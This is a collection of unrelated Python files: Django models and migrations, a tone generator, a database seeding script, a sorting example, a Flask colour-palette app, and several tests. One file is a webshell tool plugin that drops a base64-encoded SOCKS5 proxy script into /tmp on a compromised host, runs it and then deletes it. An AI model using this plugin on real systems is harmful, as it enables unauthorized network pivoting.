class LabelSettings(object):
@property
def INSTALLED_APPS(self):
return super().INSTALLED_APPS + ['labels']
default = LabelSettings
|
import math
import numpy
import pyaudio
"""Note table
Key: note name. Value: number of half steps above A.
"""
NOTES_TABLE = {'Bb': 1, 'B': 2,
'C': 3, 'C#': 4,
'D': 5, 'Eb': 6,
'E': 7, 'F': 8,
'F#': 9, 'G': 10,
'Ab': 11}
BASE_FREQ = 440
def get_note(note, base_freq=BASE_FREQ):
"""
Formula:
frequency = 440 * 2^(n/12)
:param note: Which note to return
:param base_freq: 440 is A
    :return: [frequency, note]
"""
octave = 1
if '-' in note:
i = note.split('-')
note = i[0]
if i[1][0].lower() == 'u':
octave = int(i[1][1])
        if i[1][0].lower() == 'd':
            # shift down by dividing so the resulting frequency stays positive
            octave = 1 / int(i[1][1])
    if note == 'A':
        freq = base_freq * octave
else:
freq = (base_freq * math.pow(2, NOTES_TABLE[note] / 12)) * octave
return [freq, note]
def sine(frequency, length, rate):
length = int(length * rate)
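    # Phase increment per sample: 2*pi*frequency / sample_rate (radians).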
factor = float(frequency) * (math.pi * 2) / rate
return numpy.sin(numpy.arange(length) * factor)
def play_tone(stream, frequency=BASE_FREQ, length=1, rate=44100):
chunks = []
chunks.append(sine(frequency, length, rate))
chunk = numpy.concatenate(chunks) * 0.25
    stream.write(chunk.astype(numpy.float32).tobytes())
if __name__ == '__main__':
p = pyaudio.PyAudio()
RATE = 44100
stream = p.open(format=pyaudio.paFloat32,
channels=1, rate=RATE, output=1)
note_list = (input('Enter some notes: ')).split(' ')
for note in note_list:
data = get_note(note)
print('Note: ' + data[1] + " Frequency: " + str(data[0]))
play_tone(stream, frequency=data[0])
stream.close()
p.terminate()
|
# coding: utf-8
import math
import os
import random
import string
import sys
import time
PROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(PROJECT_DIR)
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite.settings')
import django
django.setup()
from django.conf import settings
from django.db.utils import IntegrityError
from django.contrib.auth.models import User
from boards.models import Board
from comments.models import Comment
from subjects.models import Subject
print("\n\tEnter credentials for creating SUPERUSER.") if not settings.DEBUG \
else print("\n\tUsing default credentials for SUPERUSER."); time.sleep(1);
SUPERUSER_USERNAME = input("\n\tUsername: ") if not settings.DEBUG else "admin"
SUPERUSER_EMAIL = input("\n\tEmail: ") if not settings.DEBUG else "admin@example.com"
SUPERUSER_PASSWORD = input("\n\tPassword: ") if not settings.DEBUG else "top_secret"
TOTAL_BOARDS = 10 # How many boards to create?
TOTAL_SUBSCRIBES = 50 # How many subscribes to distribute randomly?
BOARDS_TITLE_LENGTH = 10
TOTAL_USERS = 10 # How many users to create?
USERS_PASSWORD = "top_secret" # What password to set for each user?
TOTAL_SUBJECTS = 20 # How many subjects to create?
TOTAL_STARS = 100 # How many stars to distribute randomly?
SUBJECTS_TITLE_LENGTH = 30
TOTAL_COMMENTS = 20 # How many comments to distribute randomly?
COMMENTS_BODY_LENGTH = 50
CHARS = string.ascii_lowercase + string.ascii_uppercase
def calculate_percentage(num, total):
"""Calculate percentage."""
return math.trunc(((num + 1) / total) * 100)
def clear_screen():
"""Clear command prompt screen."""
if os.name == "posix":
os.system('clear')
elif os.name in ("nt", "dos", "ce"):
os.system('CLS')
def show_progress_bar(percentage, func_name):
"""Show progress bar & percentage & function name."""
clear_screen()
progress_bar = "#" * int(percentage / 2)
print(f"\n\t[{progress_bar}] {percentage}%")
print(f"\n\t({func_name}) running.")
def task_done_message(total_entries=None, func_name=None):
"""Print report for single function."""
if total_entries and func_name:
print(f"\n\tAdded {total_entries} entries. ({func_name}) done.")
elif total_entries:
print(f"\n\tAdded {total_entries} entries.")
elif func_name:
print(f"\n\t({func_name}) done.")
time.sleep(1)
def generate_dummy_text(length):
"""Generate dummy text for boards, subjects & comments."""
chars_list = [random.choice(CHARS) for i in range(length)]
for i in range(len(chars_list)):
if i%5 == 0:
chars_list.insert(i, " ")
text = "".join(chars_list)
return text
def final_report():
"""Show final report for the database entries created."""
clear_screen()
print(f"""
**Final Report**
[+] {TOTAL_BOARDS} boards created.
[+] {TOTAL_USERS} users created.
[+] {TOTAL_SUBJECTS} subjects created.
[+] {TOTAL_STARS} stars distributed.
[+] {TOTAL_SUBSCRIBES} subscribes distributed.
[+] {TOTAL_COMMENTS} comments distributed.
Database populated successfully.
Login as admin using following credentials.
username: {SUPERUSER_USERNAME}
password: {SUPERUSER_PASSWORD}
""")
def create_superuser():
"""Create superuser."""
try:
user = User.objects.create_superuser(
username=SUPERUSER_USERNAME,
email=SUPERUSER_EMAIL,
password=SUPERUSER_PASSWORD
)
user.save()
task_done_message(func_name=create_superuser.__name__)
except IntegrityError as e:
print(e)
def create_boards():
"""Create boards & make SUPERUSER the admin of all boards."""
admin = User.objects.get(username=SUPERUSER_USERNAME)
total_entries = TOTAL_BOARDS
for number in range(total_entries):
try:
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, create_boards.__name__)
title = generate_dummy_text(BOARDS_TITLE_LENGTH)
description = title * random.randint(1, 10)
board = Board.objects.create(
title=title,
description=description
)
board.save()
board.admins.add(admin)
board.subscribers.add(admin)
except IntegrityError as e:
print(e)
task_done_message(total_entries, create_boards.__name__)
def create_users():
"""Create users."""
total_entries = TOTAL_USERS
for number in range(total_entries):
try:
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, create_users.__name__)
username = "".join(random.choice(CHARS) for i in range(10))
email = username + "@example.com"
user = User.objects.create_user(
username=username,
email=email,
password=USERS_PASSWORD
)
user.save()
except IntegrityError as e:
print(e)
task_done_message(total_entries, create_users.__name__)
def create_subjects():
"""Create subjects with different author & board."""
total_entries = TOTAL_SUBJECTS
for number in range(total_entries):
try:
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, create_subjects.__name__)
title = generate_dummy_text(SUBJECTS_TITLE_LENGTH)
body = title * random.randint(1, 10)
author = User.objects.get(id=random.randint(1, TOTAL_USERS))
board = Board.objects.get(id=random.randint(1, TOTAL_BOARDS))
subject = Subject.objects.create(
title=title,
body=body,
author=author,
board=board
)
subject.save()
subject.points.add(author)
except IntegrityError as e:
print(e)
task_done_message(total_entries, create_subjects.__name__)
def distribute_stars():
"""Distribute stars on different subjects."""
total_entries = TOTAL_STARS
for number in range(total_entries):
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, distribute_stars.__name__)
user = User.objects.get(id=random.randint(1, TOTAL_USERS))
subject = Subject.objects.get(id=random.randint(1, TOTAL_SUBJECTS))
if user in subject.points.all():
continue
else:
subject.points.add(user)
task_done_message(total_entries, distribute_stars.__name__)
def distribute_comments():
"""Distribute comments on different subjects with different users."""
total_entries = TOTAL_COMMENTS
for number in range(total_entries):
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, distribute_comments.__name__)
user = User.objects.get(id=random.randint(1, TOTAL_USERS))
subject = Subject.objects.get(id=random.randint(1, TOTAL_SUBJECTS))
body = generate_dummy_text(COMMENTS_BODY_LENGTH)
comment = Comment.objects.create(
body=body,
subject=subject,
commenter=user
)
comment.save()
task_done_message(total_entries, distribute_comments.__name__)
def distribute_subscribes():
"""Distribute subscribes on different boards with different users."""
total_entries = TOTAL_SUBSCRIBES
for number in range(total_entries):
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, distribute_subscribes.__name__)
user = User.objects.get(id=random.randint(1, TOTAL_USERS))
board = Board.objects.get(id=random.randint(1, TOTAL_BOARDS))
if user in board.subscribers.all():
continue
else:
board.subscribers.add(user)
task_done_message(total_entries, distribute_subscribes.__name__)
def main():
# DO NOT change the order of these functions.
clear_screen()
create_superuser()
create_boards()
create_users()
create_subjects()
distribute_stars()
distribute_subscribes()
distribute_comments()
final_report()
if __name__ == '__main__':
main()
|
from .dispatch.rules import bot
from .framework.bot import ABCBotLabeler, Bot, BotBlueprint, BotLabeler, bot_run_multibot
from .tools.dev_tools.mini_types.bot import MessageMin
Message = MessageMin
Blueprint = BotBlueprint
rules = bot
|
from django.apps import AppConfig
class CodeanalysisConfig(AppConfig):
name = 'codeAnalysis'
|
"""
Insertion Sort
Always keep the sublist of lower positions sorted. Each new item is then `inserted` back into
that sorted sublist.
The insertion step looks like bubble sort: if the item at `i` is smaller than the one before it,
exchange them, repeating until it reaches its proper position.
[5, 1, 3, 2] --- 1st pass ---> [1, 5, 3, 2] --- 2nd pass ---> [1, 3, 5, 2]
↑---↓ ↑---↓
"""
def insertion_sort(alist: list) -> list:
for idx in range(1, len(alist)):
# during each pass, insert the item at `idx` back into the previous sublist
sub_idx = idx - 1
while sub_idx >= 0:
if alist[sub_idx] > alist[idx]:
alist[sub_idx], alist[idx] = alist[idx], alist[sub_idx]
idx = sub_idx
sub_idx -= 1
return alist
if __name__ == '__main__':
a = [5, 1, 3, 2]
print(insertion_sort(a))
|
import json
import os
import secrets
from flask import render_template, url_for, redirect, request, Response
from palette.forms import ImageForm
from palette import app
from kmeans import get_colors
def save_picture(form_picture):
random_hex = secrets.token_hex(8)
_, f_ext = os.path.splitext(form_picture.filename)
picture_name = random_hex + f_ext
picture_path = os.path.join(app.root_path, 'static/img', picture_name)
form_picture.save(picture_path)
return picture_name
@app.route('/', methods=['GET', 'POST'])
def home():
form = ImageForm()
if form.validate_on_submit():
f_name = save_picture(form.picture.data)
color_list = get_colors(
form.picture.data, int(request.form['colorCount']))
palette_path = '-'.join(color_list)
return redirect(url_for('palette', colors=palette_path, image=f_name))
return render_template('home.html', form=form)
@app.route('/palette/<colors>')
def palette(colors):
hex_colors = ['#' + color for color in colors.split('-')]
image = request.args.get('image')
return render_template('palette.html', colors=hex_colors, image=image, download_url=request.path)
@app.route('/download/css/palette/<colors>')
def download_css(colors):
color_list = colors.split('-')
output = ":root {\n"
for i, val in enumerate(color_list):
output += " --color-{0}: #{1};\n".format(i + 1, val)
output += '}'
return Response(output, mimetype="text/css", headers={"Content-Disposition": 'attachment; filename="colors.css"'})
@app.route('/download/scss/palette/<colors>')
def download_scss(colors):
color_list = colors.split('-')
output = ""
for i, val in enumerate(color_list):
output += "$color-{0}: #{1};\n".format(i + 1, val)
return Response(output, mimetype="text/x-scss", headers={"Content-Disposition": 'attachment; filename="colors.scss"'})
@app.route('/download/json/palette/<colors>')
def download_json(colors):
    color_list = colors.split('-')
    # Serialize via json.dumps so the output is valid JSON (the manual string
    # building left a trailing comma before the closing brace).
    output = json.dumps(
        {"color-{0}".format(i + 1): "#" + val for i, val in enumerate(color_list)},
        indent=4)
    return Response(output, mimetype="application/json", headers={"Content-Disposition": 'attachment; filename="colors.json"'})
|
from django.template import Library, Node
register = Library()
class DumpNode(Node):
def render(self, context):
# for v in context.dicts[7]: print vars(context.get(v))
# import ipdb; ipdb.set_trace()
return ''
@register.tag
def dump_context(parser, token):
return DumpNode()
dump_context.is_safe = True
|
import dataclasses
import typing
import module3
@dataclasses.dataclass()
class Bar:
def is_in_foo(self, foo: module3.Foo):
return self in foo.bars
|
#!/usr/bin/env python3
from time import time
def find_pythagorean_triplet(n):
""" Find a Pythagorean triplet a^2+b^2=c^2 for which a+b+c=`n`. """
for c in range(n - 2, 0, -1):
for a in range(n - c - 1, 0, -1):
b = n - c - a
# Check if a,b,c form a valid Pythagorean triplet.
if a**2 + b**2 == c**2:
return a, b, c
if __name__ == '__main__':
start = time()
a, b, c = find_pythagorean_triplet(1000)
elapse = time() - start
print('Pythagorean triplet found: {} + {} + {} = 1000'.format(a, b, c))
print('\nSolution: {}'.format(a * b * c))
print('Solution found in {:.8f}s'.format(elapse))
|
# Generated by Django 3.0.1 on 2020-07-02 20:15
from django.conf import settings
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Recall',
fields=[
('Recall_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('Recall_CODE', models.CharField(max_length=500, verbose_name='Rückruf-Code')),
('Recall_NAME', models.CharField(max_length=500, verbose_name='Name')),
('Recall_DESCRIPTION', models.CharField(max_length=500, verbose_name='Beschreibung')),
('Recall_START_DATE', models.DateField(blank=True, verbose_name='Startdatum')),
('Recall_PLANNED_COMPLETATION_DATE', models.DateField(blank=True, verbose_name='Geplantes Fertigstellungsdatum')),
('Recall_STATUS', models.SmallIntegerField(choices=[(0, 'Erstellt'), (1, 'In Planung'), (2, 'In Bearbeitung'), (3, 'Abgeschlossen'), (4, 'Abgebrochen')], default=0, verbose_name='Status')),
('Recall_DATE_COMPLETED', models.DateField(blank=True, verbose_name='Tatsächliches Fertigstellungsdatum')),
],
),
migrations.CreateModel(
name='Vehicle',
fields=[
('Vehicle_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('Vehicle_VIN', models.CharField(max_length=30, verbose_name='FIN')),
('Vehicle_PLATE', models.CharField(max_length=10, verbose_name='Kennzeichen')),
('Vehicel_MAKE', models.CharField(max_length=30, verbose_name='Hersteller')),
('Vehicle_MODEL', models.CharField(max_length=30, verbose_name='Modell')),
('Vehicle_TYPE', models.CharField(max_length=60, verbose_name='Typ')),
('Vehicle_SERIES', models.CharField(max_length=30, verbose_name='Baureihe')),
('Vehicle_FIRST_REGISTRATION_DATE', models.DateField(verbose_name='Erstzulassungsdatum')),
],
),
migrations.CreateModel(
name='Workshop',
fields=[
('Workshop_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('Workshop_EXTERNAL_ID', models.CharField(max_length=10, verbose_name='externe ID')),
('Workshop_NAME', models.CharField(max_length=50, verbose_name='Name')),
('Workshop_ADDRESS', models.CharField(max_length=70, verbose_name='Adresse')),
('Workshop_ZIP', models.CharField(max_length=10, verbose_name='PLZ')),
('Workshop_CITY', models.CharField(max_length=50, verbose_name='Stadt')),
('Workshop_Email', models.EmailField(blank=True, max_length=254, verbose_name='Email')),
('Workshop_PHONE', models.CharField(blank=True, max_length=30, verbose_name='Telefon')),
],
),
migrations.CreateModel(
name='Vehicel_Recall',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('VR_STATUS', models.SmallIntegerField(choices=[(0, 'Offen'), (1, 'Vorbelegt'), (2, 'Abgeschlossen')], default=0, verbose_name='Status')),
('VR_DATE_CREATED', models.DateField(auto_now=True, verbose_name='Anlagedatum')),
('VR_DATE_COMPLETED', models.DateField(blank=True, verbose_name='Fertigstellungsdatum')),
('Recall', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Recall')),
('Vehicle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Vehicle')),
],
),
migrations.CreateModel(
name='Recall_Docs',
fields=[
('Document_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('Document_CLASS', models.SmallIntegerField(choices=[(0, 'Anleitung'), (1, 'Technische Information'), (2, 'Anschreiben'), (3, 'Sonstiges')], default=3, verbose_name='Dokumententyp')),
('Document_PATH', models.FilePathField(path='C:\\Users\\felix\\Desktop\\Projects\\my_env\\dfa\\dfa_App\\media\\uploads\\documents\\', verbose_name='Upload Pfad')),
('Recall', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Recall')),
],
),
migrations.CreateModel(
name='Note',
fields=[
('Note_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('Note_TEXT', models.CharField(max_length=500, verbose_name='Bemerkung')),
('Note_DATE', models.DateTimeField(auto_now=True, verbose_name='Zeitpunkt')),
('Note_ODOMETER', models.IntegerField(verbose_name='Kilometerstand')),
('User', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('Vehicle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Vehicle')),
],
),
migrations.CreateModel(
name='History',
fields=[
('History_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('History_EXTERNAL_ID', models.CharField(max_length=500, verbose_name='Externe ID')),
('History_DESCRIPTION', models.CharField(max_length=500, verbose_name='Beschreibung')),
('History_ODOMETER', models.IntegerField(verbose_name='Kilometerstand')),
('History_DATE', models.DateField(verbose_name='Datum')),
('Vehicle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Vehicle')),
('Workshop', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Workshop')),
],
),
migrations.AddField(
model_name='user',
name='Workshop',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Workshop'),
),
migrations.AddField(
model_name='user',
name='groups',
field=models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups'),
),
migrations.AddField(
model_name='user',
name='user_permissions',
field=models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions'),
),
]
|
# coding: utf-8
import unittest
from unittest import mock
import numpy as np
from spectrum import marple_data
from hrv.classical import (time_domain, frequency_domain, _auc, _poincare,
_nn50, _pnn50, _calc_pburg_psd)
from hrv.io import read_from_text
from hrv.rri import RRi
from tests.test_utils import FAKE_RRI
class TimeDomainIndexesTestCase(unittest.TestCase):
def test_correct_response(self):
response = time_domain(FAKE_RRI)
expected = {'rmssd': 38.07,
'sdnn': 29.82,
'nn50': 1,
'pnn50': 25,
'mrri': 793.75,
'mhr': 75.67}
np.testing.assert_almost_equal(sorted(response.values()),
sorted(expected.values()),
decimal=2)
self.assertEqual(response.keys(),
expected.keys())
def test_correct_response_with_rri_in_seconds(self):
response = time_domain(np.array(FAKE_RRI) / 1000)
expected = {'rmssd': 38.07,
'sdnn': 29.82,
'nn50': 1,
'pnn50': 25,
'mrri': 793.75,
'mhr': 75.67}
np.testing.assert_almost_equal(sorted(response.values()),
sorted(expected.values()),
decimal=2)
def test_nn50(self):
nn50 = _nn50(FAKE_RRI)
expected = 1
self.assertEqual(nn50, expected)
def test_pnn50(self):
pnn50 = _pnn50(FAKE_RRI)
expected = 25
self.assertEqual(pnn50, expected)
class FrequencyDomainTestCase(unittest.TestCase):
def setUp(self):
self.real_rri = read_from_text('tests/test_files/real_rri.txt')
def test_frequency_domain_with_welch_method(self):
time = np.cumsum(self.real_rri) / 1000.0
time -= time[0]
response = frequency_domain(self.real_rri, time=time, sf=4,
method='welch', nperseg=256, noverlap=128,
window='hanning')
expected = {'total_power': 3602.89,
'vlf': 844.5,
'lf': 1343.50,
'hf': 1414.88,
'lf_hf': 0.94,
'lfnu': 48.70,
'hfnu': 51.29}
np.testing.assert_almost_equal(sorted(response.values()),
sorted(expected.values()),
decimal=2)
self.assertEqual(response.keys(),
expected.keys())
def test_area_under_the_curve(self):
fxx = np.arange(0, 1, 1 / 1000.0)
pxx = np.ones(len(fxx))
results = _auc(fxx, pxx, vlf_band=(0, 0.04), lf_band=(0.04, 0.15),
hf_band=(0.15, 0.4))
np.testing.assert_almost_equal(results['vlf'], 0.04, decimal=2)
np.testing.assert_almost_equal(results['lf'], 0.11, decimal=2)
np.testing.assert_almost_equal(results['hf'], 0.25, decimal=2)
np.testing.assert_almost_equal(results['total_power'], 0.4, decimal=2)
np.testing.assert_almost_equal(results['lf_hf'], 0.44, decimal=1)
np.testing.assert_almost_equal(results['lfnu'], 30.5, decimal=0)
np.testing.assert_almost_equal(results['hfnu'], 69.5, decimal=0)
@mock.patch('hrv.classical.pburg')
def test_pburg_method_being_called(self, _pburg):
_calc_pburg_psd(rri=[1, 2, 3], sf=4.0)
_pburg.assert_called_once_with(data=[1, 2, 3], NFFT=None, sampling=4.0,
order=16)
@mock.patch('hrv.classical._auc')
@mock.patch('hrv.classical._interpolate_rri')
@mock.patch('hrv.classical._calc_pburg_psd')
def test_frequency_domain_function_using_pburg(self, _pburg_psd, _irr,
_auc):
fake_rri = [1, 2, 3, 4]
_irr.return_value = fake_rri
_pburg_psd.return_value = (np.array([1, 2]), np.array([3, 4]))
frequency_domain(fake_rri, sf=4, method='ar', interp_method='cubic',
order=16)
_pburg_psd.assert_called_once_with(rri=fake_rri, sf=4, order=16)
def test_calc_pburg_psd_returns_numpy_arrays(self):
fake_rri = list(range(20))
fxx, pxx = _calc_pburg_psd(fake_rri, sf=4.0)
self.assertIsInstance(fxx, np.ndarray)
self.assertIsInstance(pxx, np.ndarray)
def test_scale_by_freq_set_to_false(self):
"""
To certify that scale_by_freq is set to False this test will check
the average value of the estimated psd of the marple_data.
It must be approximately equal to 0.40.
"""
fxx, pxx = _calc_pburg_psd(marple_data, sf=1.0)
np.testing.assert_almost_equal(np.mean(pxx), 0.400, decimal=2)
@mock.patch('hrv.classical._interpolate_rri')
def test_using_rri_class(self, _interp):
"""
Test if no time is passed as argument the frequency domain function
uses time array from RRi class
"""
_interp.return_value = [800, 810, 790, 815]
rri = RRi([800, 810, 790, 815])
frequency_domain(rri)
_interp.assert_called_once_with(rri, rri.time, 4.0, 'cubic')
class NonLinearTestCase(unittest.TestCase):
def test_correct_response_from_poincare(self):
fake_rri = [10, 11, 25, 27]
expected_sd1 = 5.11
expected_sd2 = 11.64
sd1, sd2 = _poincare(fake_rri)
np.testing.assert_almost_equal(sd1, expected_sd1, decimal=1)
np.testing.assert_almost_equal(sd2, expected_sd2, decimal=1)
|
from libs.config import alias, color
from libs.myapp import send, delay_send, is_windows, has_env, get_system_code, base64_encode
from libs.functions.webshell_plugins.old_socks import *
from threading import Thread
from time import sleep
def get_python(port):
return get_php_old_socks() % port
@alias(True, _type="OTHER")
def run(port: int = 8888):
"""
old_socks
    Will be deprecated soon; please use the socks command instead.
    (Only for *unix) Run a SOCKS5 server on the target system using Python.
eg: socks {port=8888}
"""
if (is_windows()):
print(color.red("Target system isn't *unix"))
return
flag = has_env("python")
if flag:
python = get_python(port)
pyname = "check.py"
res = send(f"print(file_put_contents('/tmp/{pyname}', base64_decode(\"{base64_encode(python)}\")));")
if (not res):
return
text = res.r_text.strip()
if not len(text):
print(color.red("Failed to write file in /tmp directory."))
return
t = Thread(target=send, args=(get_system_code(f"python /tmp/{pyname}"),))
        t.daemon = True
t.start()
t2 = Thread(
target=delay_send, args=(10.0, f"unlink('/tmp/{pyname}');",)
)
        t2.daemon = True
t2.start()
sleep(1)
if (t.is_alive()):
print(f"\nStart socks5 server listen on {port} {color.green('success')}.\n")
else:
print(f"\nStart socks5 server {color.red('error')}.\n")
else:
print(
color.red(
"The target host does not exist or cannot be found in the python environment."
)
)
|
from TurtleBop.models.guild import *
|
import random
import numpy as np
import pandas as pd
import pytest
from privacy_budget import PrivacyBudget
from privacy_budget_tracker import MomentPrivacyBudgetTracker
from private_machine_learning import private_SGD
from utils import check_absolute_error
@pytest.fixture
def data():
np.random.seed(1)
x = np.random.rand(1000)*100
data = [(i, 5*i+8) for i in x]
return data
def test_private_SGD(data):
train_data, test_data = data[:800], data[800:]
param = np.random.rand(2) # y = param[0]*x+param[1]
def gradient_function(batch_data):
x, y = batch_data
y_pred = param[0]*x + param[1]
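        # Gradients of the squared error (y - y_pred)**2 with respect to param[0] and param[1].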
d0 = -2.0 * x * (y-y_pred)
d1 = -2.0 * (y-y_pred)
return [d0, d1]
def get_weights_function():
return np.copy(param)
def learning_rate_function(step):
if step < 10:
return 0.1
elif step < 50:
return 0.01
else:
return 0.005
def update_weights_function(new_weight):
param[:] = new_weight
def test_function():
n = len(test_data)
x = np.array([i[0] for i in test_data])
y = np.array([i[1] for i in test_data])
y_pred = param[0]*x + param[1]
loss = 1.0/n*np.sum((y_pred-y)**2)
check_absolute_error(loss, 0., 20.)
moment_accountant = MomentPrivacyBudgetTracker(PrivacyBudget(10, 0.001))
private_SGD(gradient_function=gradient_function,
get_weights_function=get_weights_function,
update_weights_function=update_weights_function,
learning_rate_function=learning_rate_function,
train_data=train_data,
group_size=100,
gradient_norm_bound=10,
number_of_steps=100,
sigma=1,
moment_privacy_budget_tracker=moment_accountant,
test_interval=100,
test_function=test_function
)
check_absolute_error(moment_accountant.consumed_privacy_budget.epsilon, 8.805554, 1e-6)
check_absolute_error(moment_accountant.consumed_privacy_budget.delta, 0.000625, 1e-6)
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import tensorflow as tf
class Recorder(object):
"""To save training processes, inspired by Nematus"""
    def load_from_json(self, file_name):
        tf.logging.info("Loading recorder file from {}".format(file_name))
        # Text mode and plain (str) keys: bytes keys in __dict__ would break
        # attribute access on Python 3.
        with open(file_name, 'r') as f:
            record = json.load(f)
        self.__dict__.update(record)
    def save_to_json(self, file_name):
        tf.logging.info("Saving recorder file into {}".format(file_name))
        with open(file_name, 'w') as f:
            json.dump(self.__dict__, f, indent=2)
|
from django.db import models
from django.contrib.auth.models import User
class File(models.Model):
title = models.CharField(max_length=255, blank=True)
hash_val = models.CharField(max_length=200)
uploaded_at = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return f"Title: {self.title} hash_val :{self.hash_val} uploaded_at {self.uploaded_at}"
class Meta:
ordering = ['-uploaded_at']
class FileGroup(models.Model):
title = models.CharField(max_length=255, unique=True)
files = models.ManyToManyField(File)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return f"{self.title} containing following files:\n{self.files.all()}"
class Team(models.Model):
name = models.CharField(max_length=64, unique=True)
password = models.CharField(max_length=64)
description = models.CharField(max_length=1024, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
members = models.ManyToManyField(User, through='Member')
def __str__(self):
return f"{self.name} created on {self.created_at}\nMember(s): {self.members.all()}"
class Member(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
team = models.ForeignKey(Team, on_delete=models.CASCADE, blank=True)
def __str__(self):
return f"User: {self.user} belongs to {self.team}"
|
"""
A means of running standalone commands with a shared set of options.
"""
from __future__ import print_function
from __future__ import absolute_import
#-----------------------------------------------------------------------------
# Copyright (c) 2013, yt Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
from yt.config import ytcfg
ytcfg["yt","__command_line"] = "True"
from yt.startup_tasks import parser, subparsers
from yt.mods import *
from yt.funcs import *
from yt.extern.six import add_metaclass
from yt.extern.six.moves import urllib
from yt.utilities.minimal_representation import MinimalProjectDescription
import argparse, os, os.path, math, sys, time, subprocess, getpass, tempfile
import base64, os
def _fix_ds(arg):
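    # Heuristics for locating a dataset: "<arg>/<arg>", "<arg>.dir/<arg>",
    # a ".index" file, or a path that load() can handle directly.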
if os.path.isdir("%s" % arg) and \
os.path.exists("%s/%s" % (arg,arg)):
ds = load("%s/%s" % (arg,arg))
elif os.path.isdir("%s.dir" % arg) and \
os.path.exists("%s.dir/%s" % (arg,arg)):
ds = load("%s.dir/%s" % (arg,arg))
    elif arg.endswith(".index"):
        # strip exactly the ".index" suffix before loading
        ds = load(arg[:-len(".index")])
else:
ds = load(arg)
return ds
def _add_arg(sc, arg):
if isinstance(arg, str):
arg = _common_options[arg].copy()
argc = dict(arg.items())
argnames = []
if "short" in argc: argnames.append(argc.pop('short'))
if "longname" in argc: argnames.append(argc.pop('longname'))
sc.add_argument(*argnames, **argc)
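# Metaclass hook: every YTCommand subclass that defines a name is registered
# below as an argparse sub-command, with its args attached via _add_arg.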
class YTCommandSubtype(type):
def __init__(cls, name, b, d):
type.__init__(cls, name, b, d)
if cls.name is not None:
names = ensure_list(cls.name)
for name in names:
sc = subparsers.add_parser(name,
description = cls.description,
help = cls.description)
sc.set_defaults(func=cls.run)
for arg in cls.args:
_add_arg(sc, arg)
@add_metaclass(YTCommandSubtype)
class YTCommand(object):
args = ()
name = None
description = ""
aliases = ()
ndatasets = 1
@classmethod
def run(cls, args):
self = cls()
# Some commands need to be run repeatedly on datasets
# In fact, this is the rule and the opposite is the exception
# BUT, we only want to parse the arguments once.
if cls.ndatasets > 1:
self(args)
else:
ds_args = getattr(args, "ds", [])
if len(ds_args) > 1:
datasets = args.ds
for ds in datasets:
args.ds = ds
self(args)
elif len(ds_args) == 0:
datasets = []
self(args)
else:
args.ds = getattr(args, 'ds', [None])[0]
self(args)
class GetParameterFiles(argparse.Action):
def __call__(self, parser, namespace, values, option_string = None):
if len(values) == 1:
datasets = values
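        # Two values plus --basename expand to a numbered series of datasets
        # ("%s%04i"), stepped by --skip.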
